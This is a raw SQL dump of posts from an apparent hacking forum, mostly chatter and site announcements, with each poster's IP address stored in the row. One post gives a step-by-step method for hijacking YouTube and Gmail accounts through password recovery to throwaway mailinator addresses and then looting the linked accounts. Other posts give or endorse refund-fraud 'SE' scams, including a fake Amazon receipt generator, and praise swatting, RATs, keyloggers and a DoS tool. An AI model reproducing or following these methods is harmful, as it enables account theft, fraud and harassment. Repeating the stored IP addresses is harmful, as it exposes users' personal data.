'3f770499183a5176572f585ef0025434', '0', '0'); INSERT INTO mybb_posts VALUES('1267', '191', '666', '15', 'RE: ProDos v1.0', '0', '67', 'HoverCatz', '1346187584', 'You can make the exact same gui in Gamemaker. Dude, what is even the damn point making the Gamemaker gui in c++?.. (facepalm)', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '3422020364e06b6b54c83ea946513ae6', '0', '0'); INSERT INTO mybb_posts VALUES('1268', '235', '980', '48', 'RE: Experiences of MOD', '0', '1', 't3h jok3r', '1346187759', 'I feel jealous, because your guys username & star color and Userbar match and look beast.', '41.174.2.156', '699269788', '1', '0', '0', '0', '1', '0d736184dff0062908606c40da25491f', '0', '0'); INSERT INTO mybb_posts VALUES('1269', '255', '1121', '5', 'RE: IMPORTANT!!!', '0', '1', 't3h jok3r', '1346187821', 'Does anyone care?', '41.174.2.156', '699269788', '1', '0', '0', '0', '1', '543df26c542ddce0201a32024a27a259', '0', '0'); INSERT INTO mybb_posts VALUES('1270', '190', '665', '56', 'RE: Copy and paste game', '0', '1', 't3h jok3r', '1346188839', 'http://l33thacking.com/index.php\n\nI sent a PM to someone on another forum advertising LH.', '41.174.2.156', '699269788', '1', '0', '0', '0', '1', 'ffd73b6babe047071ff3c8a68c7cb885', '0', '0'); INSERT INTO mybb_posts VALUES('1271', '235', '1268', '48', 'RE: Experiences of MOD', '0', '61', 'NXK', '1346188889', '[quote=\'t3h jok3r\' pid=\'1268\' dateline=\'1346187759\']\r\nI feel jealous, because your guys username & star color and Userbar match and look beast.\r\n[/quote]\r\nI think just having the title admin wins bro.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'e86832f330b0a36b05fc508ee872f178', '0', '0'); INSERT INTO mybb_posts VALUES('1272', '238', '1021', '56', 'RE: Ban the user above you', '0', '1', 't3h jok3r', '1346188896', 'Lmao\n\nBanned for having too many reasons to ban each other.', '41.174.2.156', '699269788', '1', '0', '0', '0', '1', 'c1ff7fe2b83c450f3f60060ce31a2986', '0', '0'); INSERT INTO mybb_posts VALUES('1273', '214', '856', '52', 'RE: [tut] Creating a IPod PID Generator', '0', '1', 't3h jok3r', '1346188983', 'Lol if he doesn\'t give credits then people neg rep him. If he does then we make fun of him lol.', '41.174.2.156', '699269788', '1', '0', '0', '0', '1', 'd22db029590e6550c0d1aa8c8e96bf1f', '0', '0'); INSERT INTO mybb_posts VALUES('1274', '274', '0', '42', 'Another death in the family for Sylvester Stallone', '0', '1', 't3h jok3r', '1346189604', '[img]http://l.yimg.com/os/289/2012/08/28/300-Stallone3-082812-jpg_142757.jpg[/img]\r\n\r\nSix weeks after his 36-year-old son, Sage, died unexpectedly, the actor has lost his only sister. Toni Ann Filiti, the 48-year-old half-sister of “The Expendables 2” star, succumbed to lung cancer on Sunday. She died at their mother Jackie Stallone’s Santa Monica home after choosing to leave UCLA hospital.\r\n\r\n\"I was holding her in my arms,” Jackie, 90, told the New York Daily News. “I had just washed [her] face and told her how pretty she looked, and she just fell asleep. … She’s too young to go, but she wasn’t feeling any pain.”', '41.174.2.156', '699269788', '1', '0', '0', '0', '1', '722e6aacf5639e94a16aeb399c0ade0c', '0', '0'); INSERT INTO mybb_posts VALUES('1275', '275', '0', '12', '[???]Hack Tons of YouTube Accounts. No Keylogging etc.[???]', '0', '5', 'Timmy', '1346189787', '[b]\r\nThis is a Tutorial about YouTube Accounts Hacking !\r\n\r\nThis Tutorial is written by me and I got the Idea from a Member of HF.\r\n\r\nSo let\'s Start !\r\n\r\n[color=#FF0000]1.Step :[/color]\r\n\r\n Go to this Link --> https://encrypted.google.com/\r\n\r\n[color=#FF0000]2.Step :[/color]\r\n\r\n Now on the click this :\r\n\r\n[spoiler] [URL=http://img839.imageshack.us/i/bild2cp.png/][IMG]http://img839.imageshack.us/img839/8743/bild2cp.png[/IMG][/URL]\r\n\r\nUploaded with [URL=http://imageshack.us]ImageShack.us[/URL] [/spoiler]\r\n\r\n[color=#FF0000]3. Step : [/color]\r\n\r\nNow go to this : \r\n\r\n[spoiler] [URL=http://img204.imageshack.us/i/bild2jb.png/][IMG]http://img204.imageshack.us/img204/3572/bild2jb.th.png[/IMG][/URL]\r\n\r\nUploaded with [URL=http://imageshack.us]ImageShack.us[/URL] [/spoiler]\r\n\r\n[color=#FF0000]4. Step:[/color]\r\n\r\nNow this is the a [color=#FF0000]very Important[/color] Part :\r\n\r\nYou have to put in an Email like this : ******@malinator.com .\r\n\r\nRemeber that it haves to end with \"mailinator.com\" .\r\n\r\nSo in the End it\'ll look like this : \"hello123@mailinator.com\" .\r\n\r\nYou can of course chose a random name like : youtube, mouse, crystal, fuckandsuck etc. .\r\n\r\n[color=#FF0000]5. Step : [/color]\r\n\r\nIt\'s very Easy : Type the Confirmation Code and click Next !\r\n\r\n[color=#FF0000]6. Step :\r\n[/color]\r\n Now Make sure that the first one is Pointed ( something like : Email to ****@mailinator.com\r\n \r\nThen Press Next !\r\n\r\n[color=#6B8E23]Ok Now the First Part is Done.[/color]\r\n\r\n[color=#1E90FF]The Second is to easy :[/color]\r\n\r\n[color=#FF0000]1. Step : [/color]\r\n\r\nGo to : www.Mailinator.com\r\n\r\n[color=#FF0000]2. Step : \r\n[/color]\r\nAt the Left there is a Box where you should Type in the Email which u used to Recover in the Previous Steps.\r\n\r\n[color=#FF0000]3. Step : [/color]\r\n\r\nLog In \r\n\r\n[color=#FF0000]4. Step :\r\n[/color]\r\n Now you are in the Mailinator Account ( Email Account )\r\n\r\n[color=#FF0000]5. Step : [/color]\r\n\r\nThere should be an Email with Google Password Recovery\r\nClick on the Link in the Email and Wollllllaaaaah :D You can change the Password.\r\n\r\n\r\nNow you can Log in . And Basically you now have a new Gmail Account and a New YouTube Account :)\r\n\r\nAnd if you are Lucky : There will be Emails in the Gmail Account like Steam, Paypal, Alertpay, Porn Websites, Premium Downloading Accounts like Filesonic, Rapidshare, Hotfile, Megaupload, Megavideo, Sharecash ....\r\n\r\n\r\n\r\nThaanks Guys and Enjoy your new Accounts ![/b]\r\n\r\nCredits: Breezo', '41.174.2.156', '699269788', '1', '0', '0', '0', '1', '6a55ea7033d1eba51bbdf67a1cd241f8', '0', '0'); INSERT INTO mybb_posts VALUES('1276', '227', '920', '13', 'RE: hack twitter?', '0', '5', 'Timmy', '1346190697', 'It\'s hard to hack twitters, but RATs and Keyloggers FTW.', '41.174.2.156', '699269788', '1', '0', '0', '0', '1', '727592e8db9de7a43ea6bf77fc6784cb', '0', '0'); INSERT INTO mybb_posts VALUES('1277', '267', '1188', '3', 'RE: [Small Announcement] Userbars/Images Updated', '0', '1', 't3h jok3r', '1346191552', 'LOL it sure was, thanks for reminding me of my mistake. I removed it.\n\nWait a min, Sin Cara, are you really calling me awful?', '41.174.2.156', '699269788', '1', '0', '0', '0', '1', '19ca4a5150552db4122f56b31749199e', '0', '0'); INSERT INTO mybb_posts VALUES('1278', '190', '665', '56', 'RE: Copy and paste game', '0', '55', 'Baws', '1346196162', 'http://l33thacking.com/index.php\n\nI sent a PM to someone on another forum advertising LH.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'ea56c94dd461d053ebe3dcb1bf5576b1', '0', '0'); INSERT INTO mybb_posts VALUES('1279', '238', '1272', '56', 'RE: Ban the user above you', '0', '55', 'Baws', '1346196222', '[quote=\'t3h jok3r\' pid=\'1272\' dateline=\'1346188896\']\r\nLmao\r\n\r\nBanned for having too many reasons to ban each other.\r\n[/quote]\r\n\r\nBanned for trying to ban me.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '28545a0782311b72552df89aec32746a', '0', '0'); INSERT INTO mybb_posts VALUES('1280', '276', '0', '4', 'Greetings.', '0', '141', 'Bane™', '1346197263', '[align=center]Hello everyone, I am new here and I am in times of need so hopefully I will make some money from the methods I learn here. I appreciate the opportunity to learn.[/align]', '72.134.24.117', '1216747637', '0', '0', '0', '0', '1', '623faa177736827fe6cb9db0120b9f20', '0', '0'); INSERT INTO mybb_posts VALUES('1281', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '141', 'Bane™', '1346197787', 'May I get a copy of this pack, thanks in advance.', '72.134.24.117', '1216747637', '0', '0', '0', '0', '1', 'bc448ab8503d7f929ae4df118a429a94', '0', '0'); INSERT INTO mybb_posts VALUES('1282', '79', '189', '29', 'RE: [tut]How to ruin somones life[DOX]', '0', '141', 'Bane™', '1346198155', 'Very interesting methods here, I thought swatting was more complex then that.', '72.134.24.117', '1216747637', '0', '0', '0', '0', '1', '7a941c189a7f9648ecbc9852c2a5a30c', '0', '0'); INSERT INTO mybb_posts VALUES('1283', '125', '313', '29', 'RE: [ebook]How to talk to a Police Officer when in trouble[Whitehat]', '0', '141', 'Bane™', '1346198291', 'Nice share! Thank you, couldn\'t hurt to read :P', '72.134.24.117', '1216747637', '0', '0', '0', '0', '1', '630486c717278f1fdbf91b3362de3a49', '0', '0'); INSERT INTO mybb_posts VALUES('1284', '164', '484', '28', 'RE: Experiences on your upgrade..', '0', '141', 'Bane™', '1346198466', 'The forum seems to be at its starting point right now, I\'m sure it will flourish. Other then that some pretty use full things have come out of it.', '72.134.24.117', '1216747637', '0', '0', '0', '0', '1', 'ad54f8d0765d045e672a9538c6f9d4f7', '0', '0'); INSERT INTO mybb_posts VALUES('1285', '112', '1281', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '54', 'Sin Cara', '1346202358', '[quote=\'Bane™\' pid=\'1281\' dateline=\'1346197787\']\r\nMay I get a copy of this pack, thanks in advance.\r\n[/quote]\r\n\r\n PPD ebooks pack is sent... check your pm now.', '119.154.22.164', '2006587044', '1', '0', '0', '0', '1', '98d77cb85de7a29e25dcef41434ceb62', '0', '0'); INSERT INTO mybb_posts VALUES('1286', '276', '1280', '4', 'RE: Greetings.', '0', '82', 'iTzIpod', '1346203064', 'Welcome Bane™ to L33thacking.com If you have any questions, feel free to PM me. I will answer them. Enjoy your stay here!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'debb132c7a10f9fe9f5d82deaa8a4362', '0', '0'); INSERT INTO mybb_posts VALUES('1287', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346203110', 'Banned for breaking the rules.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c062905a559494b5f001089281c6b8a0', '0', '0'); INSERT INTO mybb_posts VALUES('1288', '267', '1277', '3', 'RE: [Small Announcement] Userbars/Images Updated', '0', '82', 'iTzIpod', '1346204523', '[quote=\'t3h jok3r\' pid=\'1277\' dateline=\'1346191552\']\r\nLOL it sure was, thanks for reminding me of my mistake. I removed it.\r\n\r\nWait a min, Sin Cara, are you really calling me awful?\r\n[/quote]\r\n\r\nIf you read his post, I can\'t really tell if he said/meant it sucks or it\'s good due to his grammar. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '85094e57b4ad8184c50e27bfd74039a6', '0', '0'); INSERT INTO mybb_posts VALUES('1289', '255', '1121', '5', 'RE: IMPORTANT!!!', '0', '20', 'JakeUS', '1346204538', 'Maybe a cool green color?', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'd0efd1e1be2027ae9851bdb406f122f8', '0', '0'); INSERT INTO mybb_posts VALUES('1290', '265', '1184', '3', 'RE: Apathy Demoted', '0', '61', 'NXK', '1346206387', 'To much drama, I don\'t like this. you all need to get along.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '2f3b8d5e72ae4a199375bdca0cb91843', '0', '0'); INSERT INTO mybb_posts VALUES('1291', '235', '1271', '48', 'RE: Experiences of MOD', '0', '82', 'iTzIpod', '1346206390', '[quote=\'NXK\' pid=\'1271\' dateline=\'1346188889\']\r\n[quote=\'t3h jok3r\' pid=\'1268\' dateline=\'1346187759\']\r\nI feel jealous, because your guys username & star color and Userbar match and look beast.\r\n[/quote]\r\nI think just having the title admin wins bro.\r\n[/quote]\r\n\r\nCouldn\'t agree less. Being an Admin and on this awesome is better than anything in the world. Even owning it is like an awesome dream. I want to be an Admin one day. But chances of that is 0%. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '09b2d9ce3b9e7adc2d9dc1a3e65b2058', '0', '0'); INSERT INTO mybb_posts VALUES('1292', '262', '1171', '43', 'RE: Amazon Receipt Generator V.2', '0', '61', 'NXK', '1346206558', 'I used this to S.E my new keyboard, Worked Flawlessly. \n\nIf you\'re trying to s.e anything on amazon use this.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'b9905487112f470ed8d4d17242712de1', '0', '0'); INSERT INTO mybb_posts VALUES('1293', '265', '1290', '3', 'RE: Apathy Demoted', '0', '82', 'iTzIpod', '1346207418', '[quote=\'NXK\' pid=\'1290\' dateline=\'1346206387\']\r\nTo much drama, I don\'t like this. you all need to get along.\r\n[/quote]\r\n\r\nI would not want or will get along with Apathy. I have several reasons why.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8a4a48b639d22aea62183e83e402a5a4', '0', '0'); INSERT INTO mybb_posts VALUES('1294', '238', '1021', '56', 'RE: Ban the user above you', '0', '55', 'Baws', '1346209137', 'Banned for not specifying the reason.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'eee00f3b6ffbb46453ab13d29366130c', '0', '0'); INSERT INTO mybb_posts VALUES('1295', '248', '1252', '16', 'RE: [Free] [EBook] How to SE a 3DS', '0', '82', 'iTzIpod', '1346209673', '[quote=\'@SSASIN\' pid=\'1252\' dateline=\'1346176198\']\r\nGoing to be trying this as we speak. Hope i can SE dem\r\n[/quote]\r\n\r\nGood luck. (:', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '10ce9eb40185ba5ff608bce7851fa080', '0', '0'); INSERT INTO mybb_posts VALUES('1296', '275', '1275', '12', 'RE: [???]Hack Tons of YouTube Accounts. No Keylogging etc.[???]', '0', '82', 'iTzIpod', '1346210074', 'Looks promising. I will try this tomorrow (: since I am on a Mobile right now. And it is 11:14 PM. I gotta sleep soon.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8e8783cfa13088f580252b1a02f106d7', '0', '0'); INSERT INTO mybb_posts VALUES('1297', '262', '1292', '43', 'RE: Amazon Receipt Generator V.2', '0', '82', 'iTzIpod', '1346210326', '[quote=\'NXK\' pid=\'1292\' dateline=\'1346206558\']\r\nI used this to S.E my new keyboard, Worked Flawlessly. \r\n\r\nIf you\'re trying to s.e anything on amazon use this.\r\n[/quote]\r\nI love SEing from Amazon. Just that their Customer Support isn\'t really good. And they type really slow. And they don\'t budge easily.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b7b360e8e95b337d1358301df67c51d9', '0', '0'); INSERT INTO mybb_posts VALUES('1298', '273', '1249', '59', 'RE: ????Free Spreading Complete Ebook????', '0', '82', 'iTzIpod', '1346210928', 'Hey dude, I appreciate what you\'re doing to contribute to L33thacking.com Thanks for doing so. And may I have the download link please? Thanks in advance.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'efff28f28086e7dc2f555081edd68225', '0', '0'); INSERT INTO mybb_posts VALUES('1299', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1346211516', 'Baws, please stick to the rules.\r\n\r\n\r\nYou cannot post more than 3 times a day per thread in this section.\r\n\r\n\r\n\r\nOT: -- N/A I didn\'t Copy & Paste.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2b1cf3d2b000287e9d4738605d10178e', '0', '0'); INSERT INTO mybb_posts VALUES('1300', '238', '1294', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346211782', '[quote=\'Baws\' pid=\'1294\' dateline=\'1346209137\']\r\nBanned for not specifying the reason.\r\n[/quote]\r\n\r\nYou can only post 3 times a day on threads in this section.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '63825b83bc512ea0d50afb7c0dcb0486', '0', '0'); INSERT INTO mybb_posts VALUES('1301', '265', '1184', '3', 'RE: Apathy Demoted', '0', '141', 'Bane™', '1346217490', 'Here I was thinking that this was the apathy form HF. He is no were near as HQ as the real apathy.', '72.134.24.117', '1216747637', '0', '0', '0', '0', '1', 'cf378ae1b4ed22fa1b367b2e006909a6', '0', '0'); INSERT INTO mybb_posts VALUES('1302', '238', '1300', '56', 'RE: Ban the user above you', '0', '141', 'Bane™', '1346218288', '[quote=\'iTzIpod\' pid=\'1300\' dateline=\'1346211782\']\r\n[quote=\'Baws\' pid=\'1294\' dateline=\'1346209137\']\r\nBanned for not specifying the reason.\r\n[/quote]\r\n\r\nYou can only post 3 times a day on threads in this section.\r\n[/quote]\r\n\r\nBan for being an award whore.', '72.134.24.117', '1216747637', '0', '0', '0', '0', '1', '4c790c1a108b50f9a721410b96b0cea3', '0', '0'); INSERT INTO mybb_posts VALUES('1303', '238', '1302', '56', 'RE: Ban the user above you', '0', '55', 'Baws', '1346221365', '[quote=\'Bane™\' pid=\'1302\' dateline=\'1346218288\']\r\n[quote=\'iTzIpod\' pid=\'1300\' dateline=\'1346211782\']\r\n[quote=\'Baws\' pid=\'1294\' dateline=\'1346209137\']\r\nBanned for not specifying the reason.\r\n[/quote]\r\n\r\nYou can only post 3 times a day on threads in this section.\r\n[/quote]\r\n\r\nBan for being an award whore.\r\n[/quote]\r\n\r\nBanned for putting \"ban\" instead of \"banned.\"', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'ab2dc65c6ede6ce65a134e2f4aa2b664', '0', '0'); INSERT INTO mybb_posts VALUES('1304', '277', '0', '11', 'Any phreaking tutorials?', '0', '141', 'Bane™', '1346221819', 'I have a rooted android, and I want to get the most out of it. I was curious if anyone knew any advanced methods on phreaker/PDA hacking.', '72.134.24.117', '1216747637', '0', '0', '0', '0', '1', 'c87892961efffefac680c7e876b2051d', '0', '0'); INSERT INTO mybb_posts VALUES('1305', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346251955', 'Banned for having 10 rep.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ac9a3593c374cbb857a53308f378d2e2', '0', '0'); INSERT INTO mybb_posts VALUES('1306', '267', '1288', '3', 'RE: [Small Announcement] Userbars/Images Updated', '0', '1', 't3h jok3r', '1346251998', '[quote=\'iTzIpod\' pid=\'1288\' dateline=\'1346204523\']\r\n[quote=\'t3h jok3r\' pid=\'1277\' dateline=\'1346191552\']\r\nLOL it sure was, thanks for reminding me of my mistake. I removed it.\r\n\r\nWait a min, Sin Cara, are you really calling me awful?\r\n[/quote]\r\n\r\nIf you read his post, I can\'t really tell if he said/meant it sucks or it\'s good due to his grammar. :/\r\n[/quote]\r\n\r\nEhh, Doesn\'t really matter as I gave it a try :D', '41.151.175.208', '697806800', '1', '0', '0', '0', '1', '2f703aed74b5d7fccf0ecc7b29e555f0', '0', '0'); INSERT INTO mybb_posts VALUES('1307', '267', '1306', '3', 'RE: [Small Announcement] Userbars/Images Updated', '0', '82', 'iTzIpod', '1346252213', '[quote=\'t3h jok3r\' pid=\'1306\' dateline=\'1346251998\']\r\n[quote=\'iTzIpod\' pid=\'1288\' dateline=\'1346204523\']\r\n[quote=\'t3h jok3r\' pid=\'1277\' dateline=\'1346191552\']\r\nLOL it sure was, thanks for reminding me of my mistake. I removed it.\r\n\r\nWait a min, Sin Cara, are you really calling me awful?\r\n[/quote]\r\n\r\nIf you read his post, I can\'t really tell if he said/meant it sucks or it\'s good due to his grammar. :/\r\n[/quote]\r\n\r\nEhh, Doesn\'t really matter as I gave it a try :D\r\n[/quote]\r\nIn my opinion, it\'s good. (: Don\'t worry.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9237038c72b7bdee1877738c9dbda200', '0', '0'); INSERT INTO mybb_posts VALUES('1308', '278', '0', '7', 'My first mybb theme [WIP]', '0', '54', 'Sin Cara', '1346252354', 'The theme is not yet complete.... its about 85% complete... \r\n\r\nHere are some screen shoots:\r\n\r\n[IMG]http://www.auplod.com/u/dploua1710e.png[/IMG]\r\n\r\n[IMG]http://www.auplod.com/u/laopdu1710f.png[/IMG]\r\n\r\n[IMG]http://www.auplod.com/u/poadul17112.png[/IMG]\r\n\r\nPlease comment here.... \r\n\r\ni m not good in gfx so leave the logo.', '119.154.53.45', '2006594861', '1', '0', '54', '1346252524', '1', '8d445eb9bc29b4cd99aba642d5b6267f', '0', '1346252524'); INSERT INTO mybb_posts VALUES('1310', '278', '1308', '7', 'RE: My first mybb theme [WIP]', '0', '82', 'iTzIpod', '1346252666', 'It\'s alright. Nothing professional or whatever. Good luck on your forum and all though!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a53623d38575814456dbfc8d884c8030', '0', '0'); INSERT INTO mybb_posts VALUES('1343', '286', '0', '3', '[Announcement] Awards and IP Log History Features', '0', '1', 't3h jok3r', '1346270947', 'I have currently removed the awards feature and the IP log history, because the plugins got out-dated and they were causing SQL Errors. \r\n\r\nI can\'t promise when those features would be back. Sorry but I can\'t afford to keep my website offline the whole day due to a plugin.', '41.174.3.249', '699270137', '1', '0', '0', '0', '1', '706b54f9058ca23ee475a6a0f4bd6f40', '0', '0'); INSERT INTO mybb_posts VALUES('1369', '278', '1308', '7', 'RE: My first mybb theme [WIP]', '0', '1', 't3h jok3r', '1346374143', 'Kinda plain but it required a lot of work. I can understand how hard it is creating a MyBB theme. Anyway, nice work.', '41.174.6.118', '699270774', '1', '0', '0', '0', '1', 'c9f38e5a3528be2e000d66502644e38e', '0', '0'); INSERT INTO mybb_posts VALUES('1370', '270', '1367', '7', 'RE: Hi everyone', '0', '61', 'NXK', '1346377149', '[quote=\'Timmy\' pid=\'1367\' dateline=\'1346373289\']\r\nWelcome back to LH. How is your college going?\r\n[/quote]\r\n\r\nGood, I actually start next week. \r\n\r\nI hope it goes well.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '5fb28354384d5bc0e66b9a621972f738', '0', '0'); INSERT INTO mybb_posts VALUES('1312', '191', '666', '15', 'RE: ProDos v1.0', '0', '53', 'sirchamp', '1346253150', 'Whats your problem. Isnt the coder allowed to code it as he likes to?', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'ea4ae4593eaa5ef639991847639e8733', '0', '0'); INSERT INTO mybb_posts VALUES('1313', '255', '1121', '5', 'RE: IMPORTANT!!!', '0', '1', 't3h jok3r', '1346253574', 'Nah I left green for Staff. I changed it to Orange.', '41.151.138.31', '697797151', '1', '0', '0', '0', '1', 'debac18c4230deef1390460a967ee8ac', '0', '0'); INSERT INTO mybb_posts VALUES('1314', '235', '1291', '48', 'RE: Experiences of MOD', '0', '1', 't3h jok3r', '1346253799', '[quote=\'iTzIpod\' pid=\'1291\' dateline=\'1346206390\']\r\n[quote=\'NXK\' pid=\'1271\' dateline=\'1346188889\']\r\n[quote=\'t3h jok3r\' pid=\'1268\' dateline=\'1346187759\']\r\nI feel jealous, because your guys username & star color and Userbar match and look beast.\r\n[/quote]\r\nI think just having the title admin wins bro.\r\n[/quote]\r\n\r\nCouldn\'t agree less. Being an Admin and on this awesome is better than anything in the world. Even owning it is like an awesome dream. I want to be an Admin one day. But chances of that is 0%. :/\r\n[/quote]\r\nUhh I agree. Every mod has 60% chances so 0% is too less.', '41.151.138.31', '697797151', '1', '0', '0', '0', '1', '5c656c316366252cab39727ad4ce99f8', '0', '0'); INSERT INTO mybb_posts VALUES('1315', '164', '1284', '28', 'RE: Experiences on your upgrade..', '0', '1', 't3h jok3r', '1346253816', '[quote=\'Bane™\' pid=\'1284\' dateline=\'1346198466\']\r\nThe forum seems to be at its starting point right now, I\'m sure it will flourish. Other then that some pretty use full things have come out of it.\r\n[/quote]\r\n\r\nThanks, we highly appreciate your comments regarding LH.', '41.151.138.31', '697797151', '1', '0', '0', '0', '1', '9717fb39a686b3471878e624faa73bdf', '0', '0'); INSERT INTO mybb_posts VALUES('1316', '125', '313', '29', 'RE: [ebook]How to talk to a Police Officer when in trouble[Whitehat]', '0', '144', 'TheOne™', '1346254192', 'Thank you for this share \ni will read it later', '86.24.67.92', '1444430684', '0', '0', '0', '0', '1', '7a55ec33834ca5dfdfdb1023559b2e79', '0', '0'); INSERT INTO mybb_posts VALUES('1317', '276', '1280', '4', 'RE: Greetings.', '0', '1', 't3h jok3r', '1346254447', 'Welcome to L33THacking.\n\nGood Luck in earning and feel free to check out other sections.', '41.151.138.31', '697797151', '1', '0', '0', '0', '1', '7a68efdc000a0025ee872fe30f61ad13', '0', '0'); INSERT INTO mybb_posts VALUES('1318', '277', '1304', '11', 'RE: Any phreaking tutorials?', '0', '61', 'NXK', '1346255675', 'There\'s alot of youtube videos that will show you the best things you can do with a rooted android like over clocking it, things like that.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '6edef58a70f64a9bf9feed85e8f5031d', '0', '0'); INSERT INTO mybb_posts VALUES('1319', '247', '1182', '16', 'RE: [Free] [EBook] How to SE Pringles', '0', '61', 'NXK', '1346255819', '[quote=\'iTzIpod\' pid=\'1182\' dateline=\'1346109303\']\r\nFor me, I live in Canada so the tab is called Ask Us. And it works from there. \r\n\r\n\r\nBut I think Kelloggs now owns Pringles. \r\nI didn\'t write this eBook sorry :/\r\nI tried it 3 times and got it to work successfully. Sorry guys.\r\n[/quote]\r\n\r\nMy fellow mod is canadian also? \r\n\r\nand iv always just used astro pid for pringles and told them my package had he airtight seal punctured. Ill give this a read though.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '5a2f42e5646867886bc2faef44e936e7', '0', '0'); INSERT INTO mybb_posts VALUES('1320', '271', '1247', '53', 'RE: Minecraft/Rsps coding', '0', '82', 'iTzIpod', '1346255864', '[quote=\'HoverCatz\' pid=\'1247\' dateline=\'1346170143\']\r\nTried to connect with the client, it wont connect to the server. Cant login at all\r\n[/quote]\r\n\r\nThe server was probably offline.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c700ec374a28857353531211b585e512', '0', '0'); INSERT INTO mybb_posts VALUES('1321', '186', '638', '16', 'RE: SE razor?', '0', '61', 'NXK', '1346255940', 'If you\'re going to se a deathadder PM me, I have one and i can take pictures for you with the email you need and everything. I have never done any SEing with my deathadder.\n\nI also have released astro pid so all you need is a friend with the item you are trying to se. get them to take the pictures for you with your pid/email', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '87e68ca7004fc6127aa2f491ddd1dad3', '0', '0'); INSERT INTO mybb_posts VALUES('1322', '279', '0', '3', '[Bug] Awards are gone', '0', '82', 'iTzIpod', '1346256050', 'Not sure if it is a Bug, but I can\'t seem to see the awards anymore. \r\n\r\n@t3h jok3r, please fix this. :/ I miss my awards.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1339d6f20f1174e3bf2dc21e93cb6e6a', '0', '0'); INSERT INTO mybb_posts VALUES('1323', '247', '1319', '16', 'RE: [Free] [EBook] How to SE Pringles', '0', '82', 'iTzIpod', '1346256106', '[quote=\'NXK\' pid=\'1319\' dateline=\'1346255819\']\r\n[quote=\'iTzIpod\' pid=\'1182\' dateline=\'1346109303\']\r\nFor me, I live in Canada so the tab is called Ask Us. And it works from there. \r\n\r\n\r\nBut I think Kelloggs now owns Pringles. \r\nI didn\'t write this eBook sorry :/\r\nI tried it 3 times and got it to work successfully. Sorry guys.\r\n[/quote]\r\n\r\nMy fellow mod is canadian also? \r\n\r\nand iv always just used astro pid for pringles and told them my package had he airtight seal punctured. Ill give this a read though.\r\n[/quote]\r\n\r\nCanadians eh? :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e38f6e286a888be28ecde7650eb40a4b', '0', '0'); INSERT INTO mybb_posts VALUES('1324', '278', '1308', '7', 'RE: My first mybb theme [WIP]', '0', '61', 'NXK', '1346256162', 'I feel like it\'s too plain. But good attempt at your first one.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '82635dbe13581ce21f199d66660a3b7f', '0', '0'); INSERT INTO mybb_posts VALUES('1325', '235', '1314', '48', 'RE: Experiences of MOD', '0', '82', 'iTzIpod', '1346256198', '[quote=\'t3h jok3r\' pid=\'1314\' dateline=\'1346253799\']\r\n[quote=\'iTzIpod\' pid=\'1291\' dateline=\'1346206390\']\r\n[quote=\'NXK\' pid=\'1271\' dateline=\'1346188889\']\r\n[quote=\'t3h jok3r\' pid=\'1268\' dateline=\'1346187759\']\r\nI feel jealous, because your guys username & star color and Userbar match and look beast.\r\n[/quote]\r\nI think just having the title admin wins bro.\r\n[/quote]\r\n\r\nCouldn\'t agree less. Being an Admin and on this awesome is better than anything in the world. Even owning it is like an awesome dream. I want to be an Admin one day. But chances of that is 0%. :/\r\n[/quote]\r\nUhh I agree. Every mod has 60% chances so 0% is too less.\r\n[/quote]\r\n\r\nOh. But good luck finding that Admin @t3h jok3r!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b293ff360e3f4d634b2b1b649c8451e4', '0', '0'); INSERT INTO mybb_posts VALUES('1326', '191', '666', '15', 'RE: ProDos v1.0', '0', '82', 'iTzIpod', '1346256318', 'I don\'t think it matters @sirchamp and @HoverCatz.\nIt still is a Dos that works.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '499f9b9dab718d9a3c5deeebc583a621', '0', '0'); INSERT INTO mybb_posts VALUES('1363', '293', '0', '16', 'How to SE fererro', '0', '154', 'fap', '1346370306', 'Go to you\'re ferrero (kinder bueno) country\'s website\r\n\r\ngo to their contact us (email them)\r\n\r\nSay there was no creme filling or make up your own excuse.\r\n\r\nThey should email you back saying sorry for the inconvienience and they will send you some chocolate ! :).\r\n\r\nThere\'s such little steps because it is that easy.', '92.234.104.156', '1558866076', '0', '0', '0', '0', '1', '36d5414514553b3601b50b228b4bf12b', '0', '0'); INSERT INTO mybb_posts VALUES('1328', '279', '1322', '3', 'RE: [Bug] Awards are gone', '0', '61', 